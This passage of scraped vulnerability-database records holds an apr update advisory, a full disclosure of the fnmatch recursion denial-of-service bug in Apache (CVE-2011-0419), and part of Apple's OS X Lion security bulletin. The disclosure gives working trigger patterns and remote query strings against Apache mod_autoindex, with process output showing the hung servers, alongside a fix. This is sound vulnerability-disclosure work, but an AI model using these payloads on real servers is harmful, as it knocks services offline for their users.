http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\r\n \r\n The updated packages have been patched to correct this issue.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1928\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2009.0:\r\n 2c7702bac13071476aa9cf6fb393fdb6 2009.0/i586/libapr1-1.3.3-2.3mdv2009.0.i586.rpm\r\n 5e940c98bc40a053987c7c3d6627d589 2009.0/i586/libapr-devel-1.3.3-2.3mdv2009.0.i586.rpm \r\n 983b76007b37d3e38cdf0b5db663331f 2009.0/SRPMS/apr-1.3.3-2.3mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 8f072f4265303215c93f99202a7ec4cb 2009.0/x86_64/lib64apr1-1.3.3-2.3mdv2009.0.x86_64.rpm\r\n 1ecd0f3c0ad5c75655a23d771bc3ae9c 2009.0/x86_64/lib64apr-devel-1.3.3-2.3mdv2009.0.x86_64.rpm \r\n 983b76007b37d3e38cdf0b5db663331f 2009.0/SRPMS/apr-1.3.3-2.3mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2010.1:\r\n ede2034589d5e9416b17dd9e4167e18a 2010.1/i586/libapr1-1.4.2-1.2mdv2010.2.i586.rpm\r\n d5860f1f16e2238067c0cddee433dc22 2010.1/i586/libapr-devel-1.4.2-1.2mdv2010.2.i586.rpm \r\n 260e403ed62cfc07f888c4d338ebb9b0 2010.1/SRPMS/apr-1.4.2-1.2mdv2010.2.src.rpm\r\n\r\n Mandriva Linux 2010.1/X86_64:\r\n a867686d5403e7b8a72d5a58a982f555 2010.1/x86_64/lib64apr1-1.4.2-1.2mdv2010.2.x86_64.rpm\r\n 7482662cca789074a7b21ab8db2c694b 2010.1/x86_64/lib64apr-devel-1.4.2-1.2mdv2010.2.x86_64.rpm \r\n 260e403ed62cfc07f888c4d338ebb9b0 2010.1/SRPMS/apr-1.4.2-1.2mdv2010.2.src.rpm\r\n\r\n Corporate 4.0:\r\n c9f63c313cbb31f039acf5e9186b6014 corporate/4.0/i586/libapr1-1.2.7-1.3.20060mlcs4.i586.rpm\r\n a441fe50a67e76be51474d80b24a8a68 corporate/4.0/i586/libapr1-devel-1.2.7-1.3.20060mlcs4.i586.rpm \r\n 5320e53a027fc5fc499c3c8d06a06a19 corporate/4.0/SRPMS/apr-1.2.7-1.3.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n 6e3baecd3fd9d9aada1cc70704463765 corporate/4.0/x86_64/lib64apr1-1.2.7-1.3.20060mlcs4.x86_64.rpm\r\n b4fde9daea25d7a2c73ef5264120fa2e corporate/4.0/x86_64/lib64apr1-devel-1.2.7-1.3.20060mlcs4.x86_64.rpm \r\n 5320e53a027fc5fc499c3c8d06a06a19 corporate/4.0/SRPMS/apr-1.2.7-1.3.20060mlcs4.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 0c35c8e277a38cb06715acce05f46102 mes5/i586/libapr1-1.3.3-2.3mdvmes5.2.i586.rpm\r\n d34197b4031cabf82a829647f5bca918 mes5/i586/libapr-devel-1.3.3-2.3mdvmes5.2.i586.rpm \r\n 82bd6bc94f15ac7017a7d8182d33799e mes5/SRPMS/apr-1.3.3-2.3mdvmes5.2.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n a4aed6ec67deb41f6b59cae60dabfb9e mes5/x86_64/lib64apr1-1.3.3-2.3mdvmes5.2.x86_64.rpm\r\n 39adf1ab04e4b7cbb6875a2f2c2fafd8 mes5/x86_64/lib64apr-devel-1.3.3-2.3mdvmes5.2.x86_64.rpm \r\n 82bd6bc94f15ac7017a7d8182d33799e mes5/SRPMS/apr-1.3.3-2.3mdvmes5.2.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFN1j7zmqjQ0CJFipgRArP5AKC39KmLQc0Jb5TOOuu8NpBfmxHPrwCgy5Rj\r\nAWGRfBe7vZXB3JYQt89xN+I=\r\n=mc/L\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2011-05-21T00:00:00", "type": "securityvulns", "title": "[ MDVSA-2011:095 ] apr", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2011-05-21T00:00:00", "id": "SECURITYVULNS:DOC:26381", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26381", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:40", "description": "[ Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ]\r\n\r\nAuthor: Maksymilian Arciemowicz\r\nhttp://netbsd.org/donations/\r\nhttp://securityreason.com/\r\nhttp://cxib.net/\r\n\r\nDate:\r\n- Dis.: 29.01.2011\r\n- Pub.: 13.05.2011\r\n\r\nCVE: CVE-2011-0419\r\nCWE: CWE-399\r\n\r\nAffected Software (verified):\r\n- Apache 2.2.17\r\n- NetBSD 5.1\r\n- OpenBSD 4.8\r\n- FreeBSD \r\n- MacOSX 10.6\r\n- SunSolaris 10\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/98\r\n\r\n\r\n--- 0.Description ---\r\nfnmatch -- match filename or pathname using shell glob rules\r\n\r\nSYNOPSIS\r\n #include <fnmatch.h>\r\n\r\n int\r\n fnmatch(const char *pattern, const char *string, int flags);\r\n\r\n\r\n--- 1. Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ---\r\nAttacker, what may modify first and second parameters(pattern,string) of fnmatch(3), may cause\r\nto CPU resource exhaustion. To see problem huge complexity, try compile code below:\r\n\r\nfnmatch("?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*","xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",0);\r\n\r\nfnmatch should return quickly answer, logically int. \r\n\r\n-fnmatch()/netbsd/fnmatch.c--\r\n /* Collapse multiple stars. */\r\n while (c == '*')\r\n c = FOLDCASE(*++pattern, flags);\r\n-fnmatch()/netbsd/fnmatch.c--\r\n\r\nfnmatch() skip multiple stars here. It protect us before patterns like\r\n"********************...", but not before "*?*?*?*?*?*?*?*?*?*?*?...".\r\nLet's see what will happen if we use single star in pattern:\r\n\r\n-fnmatch()/netbsd/fnmatch.c--\r\n case '*':\r\n c = FOLDCASE(*pattern, flags);\r\n /* Collapse multiple stars. */\r\n while (c == '*')\r\n c = FOLDCASE(*++pattern, flags);\r\n\r\n if (*string == '.' && (flags & FNM_PERIOD) &&\r\n (string == stringstart ||\r\n ((flags & FNM_PATHNAME) && *(string - 1) == '/')))\r\n return (FNM_NOMATCH);\r\n\r\n.\r\n\r\n /* General case, use recursion. */\r\n while ((test = FOLDCASE(*string, flags)) != EOS) {\r\n if (!fnmatch(pattern, string, <====================== RECURSION\r\n flags & ~FNM_PERIOD))\r\n return (0);\r\n if (test == '/' && flags & FNM_PATHNAME)\r\n break;\r\n ++string;\r\n }\r\n return (FNM_NOMATCH);\r\n-fnmatch()/netbsd/fnmatch.c--\r\n\r\nRecursion in this code:\r\n if (!fnmatch(pattern, string, <=== RECURSION WITHOUT LIMITS\r\n\r\nmay cause to denial of service. Some recursion limit is missing here.\r\nFix has been created together with NetBSD and should work on all BSD's implementations of\r\nfnmatch(3). To fix it, limit recursion_level to 64, because it guaranty quickly result. e.g.\r\n\r\n-fix---\r\n.\r\nstatic int\r\nfnmatchx(const char *pattern, const char *string, int flags, size_t recursion) <=== ADD (\r\nsize_t recursion )\r\n{\r\n const char *stringstart;\r\n char c, test;\r\n\r\n _DIAGASSERT(pattern != NULL);\r\n _DIAGASSERT(string != NULL);\r\n\r\n if (recursion-- == 0) <=== DECREMENT recursion_level\r\n return FNM_NORES;\r\n\r\n.\r\nint\r\nfnmatch(const char *pattern, const char *string, int flags)\r\n{\r\n return fnmatchx(pattern, string, flags, 64); <=== SET recursion_level HERE\r\n}\r\n.\r\n-fix---\r\n\r\nThis fix limit max recursion level to 64. Any bigger value, may be unsafe \r\n\r\nTo demonstrate this flaws, i'm using apache with mod_autoindex because it's best vector here.\r\nThere are two ways to denial of service, local and remote.\r\n\r\nIMPORTANT:\r\nfnmatch(const char *pattern, const char *string, int flags);\r\n\r\nstrlen(string) should be smaller as strlen(pattern)\r\n\r\nlet's start\r\n\r\n-apache.2.2.17;apr_fnmatch();srclib/apr/strings/apr_fnmatch.c---\r\n.\r\n /* Collapse multiple stars. */\r\n while (c == '*') {\r\n c = *++pattern;\r\n }\r\n.\r\n\r\n /* General case, use recursion. */\r\n while ((test = *string) != EOS) {\r\n if (!apr_fnmatch(pattern, string, flags & ~APR_FNM_PERIOD)) { <=== RECURSION\r\n return (APR_SUCCESS);\r\n.\r\n-apache.2.2.17;apr_fnmatch();srclib/apr/strings/apr_fnmatch.c---\r\n\r\nThis is BSD implementation of fnmatch(3). So the same issue exist in NetBSD, OpenBSD etc. Now\r\nwe need find some code, where apr_fnmtach() is used.\r\n\r\n-apache.2.2.17;mod_autoindex.c---\r\n.\r\n /*\r\n * Make the comparison using the cheapest method; only do\r\n * wildcard checking if we must.\r\n */\r\n if (tuple->wildcards) {\r\n found = (apr_fnmatch(tuple->pattern, filename, MATCH_FLAGS) == 0); <=== LOCAL DOS\r\n }\r\n.\r\n if (pattern && (apr_fnmatch(pattern, dirent->name, <=== REMOTE DOS\r\n APR_FNM_NOESCAPE | APR_FNM_PERIOD\r\n#ifdef CASE_BLIND_FILESYSTEM\r\n | APR_FNM_CASE_BLIND\r\n#endif\r\n )\r\n != APR_SUCCESS)) {\r\n return (NULL);\r\n }\r\n.\r\n-apache.2.2.17;mod_autoindex.c---\r\n\r\nAs we can see, in mod_autoindex are two apr_fnmatch() cals.\r\n\r\n\r\n found = (apr_fnmatch(tuple->pattern, filename, MATCH_FLAGS) == 0); <=== LOCAL DOS\r\n\r\nand\r\n\r\n if (pattern && (apr_fnmatch(pattern, dirent->name, <=== REMOTE DOS\r\n\r\nTo use the first, we need create some file with long filename e.g.\r\n\r\n"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"\r\n\r\nthen create .htaccess with 'AddDescription'\r\n\r\nAddDescription "fnmatch DoS"\r\n*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*\r\n\r\nResult:\r\nwww-data 1816 2.2 0.3 419048 9844 ? R 18:39 5:39 /usr/sbin/apache2 -k start\r\n\r\nThe second possibility to remote denial of service, come when attacked servers contain\r\ndirectory with long filename.\r\n\r\nhttp://localhost/?P=*?*?...to.4096\r\n\r\nwhere variable 'P', will be used in {{{apr_fnmatch(pattern, dirent->name,}}} as a pattern. \r\n\r\nIf the filename is to short, of course we can set long pattern e.g. 4096 chars.\r\n\r\nhttp://localhost/?P=*?*?*?*?*?*....?*?*...to.4096\r\n\r\nApache 2.2.18 fix this problem.\r\n\r\nTo local attack, use this script written in php and execute it in writable directory.\r\n\r\nhttp://cxib.net/stuff/apache.fnmatch.phps\r\n\r\n127# httpd -v && uname -a \r\nServer version: Apache/2.2.17 (Unix)\r\nServer built: Dec 28 2010 13:21:44\r\nNetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 \r\nbuilds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC\r\ni386\r\n127# ls -la \r\ntotal 8\r\ndrwxrwxrwx 2 root wheel 512 Feb 8 21:41 .\r\ndrwxr-xr-x 7 www wheel 1024 Jan 31 08:49 ..\r\n-rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess\r\n-rw-r--r-- 1 www wheel 0 Feb 8 19:39\r\ncx...........................................................................................................................\r\n-rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php\r\n127# ps -aux -p 617 \r\nUSER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND\r\nwww 617 98.6 0.4 10028 4004 ? R 7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start \r\n\r\nTime = 121:43 and counting\r\n\r\nIn result, we get:\r\n\r\n.\r\nwww 2044 0.0 0.4 10028 3932 ? R 9:49PM 0:20.23 /usr/pkg/sbin/httpd -k start \r\nwww 2047 0.0 0.4 10028 3932 ? R 9:49PM 0:19.29 /usr/pkg/sbin/httpd -k start \r\nwww 2051 0.0 0.4 10028 3924 ? R 9:50PM 0:19.86 /usr/pkg/sbin/httpd -k start \r\nwww 2086 0.2 0.4 10028 3936 ? R 9:49PM 0:19.62 /usr/pkg/sbin/httpd -k start \r\nwww 2088 0.0 0.4 10028 3936 ? R 9:49PM 0:19.76 /usr/pkg/sbin/httpd -k start \r\nwww 2206 0.0 0.4 10028 3948 ? R 9:50PM 0:20.92 /usr/pkg/sbin/httpd -k start \r\nwww 2225 0.0 0.4 10028 3944 ? R 9:50PM 0:20.63 /usr/pkg/sbin/httpd -k start \r\nwww 2233 0.3 0.4 10028 3948 ? R 9:49PM 0:19.95 /usr/pkg/sbin/httpd -k start \r\nwww 2278 0.0 0.4 10028 3924 ? R 9:50PM 0:18.63 /usr/pkg/sbin/httpd -k start \r\nwww 2316 0.0 0.4 10028 3924 ? R 9:50PM 0:19.76 /usr/pkg/sbin/httpd -k start \r\nwww 2317 0.0 0.4 10028 3924 ? R 9:50PM 0:19.85 /usr/pkg/sbin/httpd -k start \r\n.\r\n\r\ncx@cx64:~$ telnet 172.11.12.129 80\r\nTrying 172.11.12.129...\r\ntelnet: Unable to connect to remote host: Connection timed out\r\ncx@cx64:~$ \r\n\r\n\r\n--- 2. Exploit ---\r\nhttp://cxib.net/stuff/apr_fnmatch.txt\r\n\r\n\r\n--- 3. Fix ---\r\nFix has been created together with netbsd team and should fix this problem in all BSD's\r\nimplementation of fnmatch(3).\r\n\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/fnmatch.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fnmatch.c?annotate=1.15\r\nhttp://netbsd.org/donations/\r\n\r\n\r\n--- 4. References ---\r\nhttps://rhn.redhat.com/errata/RHSA-2011-0507.html\r\nhttp://httpd.apache.org/security/vulnerabilities_22.html\r\nhttp://www.apache.org/dist/apr/CHANGES-APR-1.4\r\n\r\nhttp://cwe.mitre.org/data/definitions/399.html\r\n\r\nA similar vulnerability based on CWE-399\r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0762\r\nhttp://securityreason.com/achievement_securityalert/95\r\n\r\n\r\n--- 5. Greets ---\r\nChristos Zoulas, sp3x, Infospec\r\n\r\n\r\n--- 6. Contact ---\r\nAuthor: Maksymilian Arciemowicz [ SecurityReason.com ]\r\n\r\nEmail:\r\n- cxib {a\./t] securityreason [d=t} com\r\n\r\nGPG:\r\n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n\r\nhttp://netbsd.org/donations/\r\nhttp://securityreason.com/\r\nhttp://cxib.net/", "cvss3": {}, "published": "2011-05-16T00:00:00", "type": "securityvulns", "title": "Multiple Vendors libc/fnmatch(3) DoS (incl apache poc)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-0762"], "modified": "2011-05-16T00:00:00", "id": "SECURITYVULNS:DOC:26373", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26373", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2021-06-08T19:03:07", "description": "Multiple vulnerabilities in different system components.", "cvss3": {}, "published": "2011-10-24T00:00:00", "type": "securityvulns", "title": "Apple OS X multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-0187", "CVE-2011-0421", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2011-3221", "CVE-2011-3227", "CVE-2011-0259", "CVE-2011-3216", "CVE-2011-3246", "CVE-2011-1466", "CVE-2011-3435", "CVE-2011-3222", "CVE-2011-0229", "CVE-2011-1521", "CVE-2010-4172", "CVE-2011-0419", "CVE-2011-1092", "CVE-2011-0252", "CVE-2011-3223", "CVE-2011-0185", "CVE-2011-1755", "CVE-2011-3220", "CVE-2011-0224", "CVE-2011-2464", "CVE-2010-4645", "CVE-2011-3214", "CVE-2010-3436", "CVE-2010-1157", "CVE-2011-0013", "CVE-2011-0708", "CVE-2011-3228", "CVE-2011-0249", "CVE-2011-0231", "CVE-2011-0534", "CVE-2011-3437", "CVE-2011-2691", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-2089", "CVE-2011-3224", "CVE-2011-0226", "CVE-2011-1470", "CVE-2011-3192", "CVE-2011-3219", "CVE-2011-3436", "CVE-2011-3225", "CVE-2011-3215", "CVE-2011-0260", "CVE-2011-2692", "CVE-2010-2227", "CVE-2011-1469", "CVE-2011-3218", "CVE-2010-3614", "CVE-2011-3213", "CVE-2010-3718", "CVE-2011-0250", "CVE-2011-3217", "CVE-2010-3613", "CVE-2010-1634", "CVE-2010-0097", "CVE-2011-0251", "CVE-2011-0707", "CVE-2011-0230", "CVE-2011-3226", "CVE-2011-2690", "CVE-2011-0411", "CVE-2011-3212", "CVE-2009-4022", "CVE-2011-1910"], "modified": "2011-10-24T00:00:00", "id": "SECURITYVULNS:VULN:11973", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11973", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:42", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2011-10-12-3 OS X Lion v10.7.2 and Security Update 2011-006\r\n\r\nOS X Lion v10.7.2 and Security Update 2011-006 is now available and\r\naddresses the following:\r\n\r\nApache\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Multiple vulnerabilities in Apache\r\nDescription: Apache is updated to version 2.2.20 to address several\r\nvulnerabilities, the most serious of which may lead to a denial of\r\nservice. CVE-2011-0419 does not affect OS X Lion systems. Further\r\ninformation is available via the Apache web site at\r\nhttp://httpd.apache.org/\r\nCVE-ID\r\nCVE-2011-0419\r\nCVE-2011-3192\r\n\r\nApplication Firewall\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Executing a binary with a maliciously crafted name may lead\r\nto arbitrary code execution with elevated privileges\r\nDescription: A format string vulnerability existed in Application\r\nFirewall's debug logging.\r\nCVE-ID\r\nCVE-2011-0185 : an anonymous reporter\r\n\r\nATS\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing or downloading a document containing a maliciously\r\ncrafted embedded font may lead to arbitrary code execution\r\nDescription: A signedness issue existed in ATS' handling of Type 1\r\nfonts. This issue does not affect systems prior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-3437\r\n\r\nATS\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing or downloading a document containing a maliciously\r\ncrafted embedded font may lead to arbitrary code execution\r\nDescription: An out of bounds memory access issue existed in ATS'\r\nhandling of Type 1 fonts. This issue does not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-0229 : Will Dormann of the CERT/CC\r\n\r\nATS\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Applications which use the ATSFontDeactivate API may be\r\nvulnerable to an unexpected application termination or arbitrary code\r\nexecution\r\nDescription: A buffer overflow issue existed in the\r\nATSFontDeactivate API.\r\nCVE-ID\r\nCVE-2011-0230 : Steven Michaud of Mozilla\r\n\r\nBIND\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Multiple vulnerabilities in BIND 9.7.3\r\nDescription: Multiple denial of service issues existed in BIND\r\n9.7.3. These issues are addressed by updating BIND to version\r\n9.7.3-P3.\r\nCVE-ID\r\nCVE-2011-1910\r\nCVE-2011-2464\r\n\r\nBIND\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Multiple vulnerabilities in BIND\r\nDescription: Multiple denial of service issues existed in BIND.\r\nThese issues are addressed by updating BIND to version 9.6-ESV-R4-P3.\r\nCVE-ID\r\nCVE-2009-4022\r\nCVE-2010-0097\r\nCVE-2010-3613\r\nCVE-2010-3614\r\nCVE-2011-1910\r\nCVE-2011-2464\r\n\r\nCertificate Trust Policy\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1.\r\nImpact: Root certificates have been updated\r\nDescription: Several trusted certificates were added to the list of\r\nsystem roots. Several existing certificates were updated to their\r\nmost recent version. The complete list of recognized system roots may\r\nbe viewed via the Keychain Access application.\r\n\r\nCFNetwork\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Safari may store cookies it is not configured to accept\r\nDescription: A synchronization issue existed in CFNetwork's handling\r\nof cookie policies. Safari's cookie preferences may not be honored,\r\nallowing websites to set cookies that would be blocked were the\r\npreference enforced. This update addresses the issue through improved\r\nhandling of cookie storage.\r\nCVE-ID\r\nCVE-2011-0231 : Martin Tessarek, Steve Riggins of Geeks R Us, Justin\r\nC. Walker, and Stephen Creswell\r\n\r\nCFNetwork\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Visiting a maliciously crafted website may lead to the\r\ndisclosure of sensitive information\r\nDescription: An issue existed in CFNetwork's handling of HTTP\r\ncookies. When accessing a maliciously crafted HTTP or HTTPS URL,\r\nCFNetwork could incorrectly send the cookies for a domain to a server\r\noutside that domain. This issue does not affect systems prior to OS X\r\nLion.\r\nCVE-ID\r\nCVE-2011-3246 : Erling Ellingsen of Facebook\r\n\r\nCoreFoundation\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing a maliciously crafted website or e-mail message may\r\nlead to an unexpected application termination or arbitrary code\r\nexecution\r\nDescription: A memory corruption issue existed in CoreFoundation's\r\nhandling of string tokenization. This issue does not affect OS X Lion\r\nsystems. This update addresses the issue through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2011-0259 : Apple\r\n\r\nCoreMedia\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Visiting a maliciously crafted website may lead to the\r\ndisclosure of video data from another site\r\nDescription: A cross-origin issue existed in CoreMedia's handling of\r\ncross-site redirects. This issue is addressed through improved origin\r\ntracking.\r\nCVE-ID\r\nCVE-2011-0187 : Nirankush Panchbhai and Microsoft Vulnerability\r\nResearch (MSVR)\r\n\r\nCoreMedia\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of QuickTime movie files. These issues do not affect OS X\r\nLion systems.\r\nCVE-ID\r\nCVE-2011-0224 : Apple\r\n\r\nCoreProcesses\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: A person with physical access to a system may partially\r\nbypass the screen lock\r\nDescription: A system window, such as a VPN password prompt, that\r\nappeared while the screen was locked may have accepted keystrokes\r\nwhile the screen was locked. This issue is addressed by preventing\r\nsystem windows from requesting keystrokes while the screen is locked.\r\nThis issue does not affect systems prior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-0260 : Clint Tseng of the University of Washington, Michael\r\nKobb, and Adam Kemp\r\n\r\nCoreStorage\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Converting to FileVault does not erase all existing data\r\nDescription: After enabling FileVault, approximately 250MB at the\r\nstart of the volume was left unencrypted on the disk in an unused\r\narea. Only data which was present on the volume before FileVault was\r\nenabled was left unencrypted. This issue is addressed by erasing this\r\narea when enabling FileVault, and on the first use of an encrypted\r\nvolume affected by this issue. This issue does not affect systems\r\nprior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-3212 : Judson Powers of ATC-NY\r\n\r\nFile Systems\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: An attacker in a privileged network position may manipulate\r\nHTTPS server certificates, leading to the disclosure of sensitive\r\ninformation\r\nDescription: An issue existed in the handling of WebDAV volumes on\r\nHTTPS servers. If the server presented a certificate chain that could\r\nnot be automatically verified, a warning was displayed and the\r\nconnection was closed. If the user clicked the "Continue" button in\r\nthe warning dialog, any certificate was accepted on the following\r\nconnection to that server. An attacker in a privileged network\r\nposition may have manipulated the connection to obtain sensitive\r\ninformation or take action on the server on the user's behalf. This\r\nupdate addresses the issue by validating that the certificate\r\nreceived on the second connection is the same certificate originally\r\npresented to the user.\r\nCVE-ID\r\nCVE-2011-3213 : Apple\r\n\r\nIOGraphics\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: A person with physical access may be able to bypass the\r\nscreen lock\r\nDescription: An issue existed with the screen lock when used with\r\nApple Cinema Displays. When a password is required to wake from\r\nsleep, a person with physical access may be able to access the system\r\nwithout entering a password if the system is in display sleep mode.\r\nThis update addresses the issue by ensuring that the lock screen is\r\ncorrectly activated in display sleep mode. This issue does not affect\r\nOS X Lion systems.\r\nCVE-ID\r\nCVE-2011-3214 : Apple\r\n\r\niChat Server\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: A remote attacker may cause the Jabber server to consume\r\nsystem resources disproportionately\r\nDescription: An issue existed in the handling of XML external\r\nentities in jabberd2, a server for the Extensible Messaging and\r\nPresence Protocol (XMPP). jabberd2 expands external entities in\r\nincoming requests. This allows an attacker to consume system\r\nresources very quickly, denying service to legitimate users of the\r\nserver. This update addresses the issue by disabling entity expansion\r\nin incoming 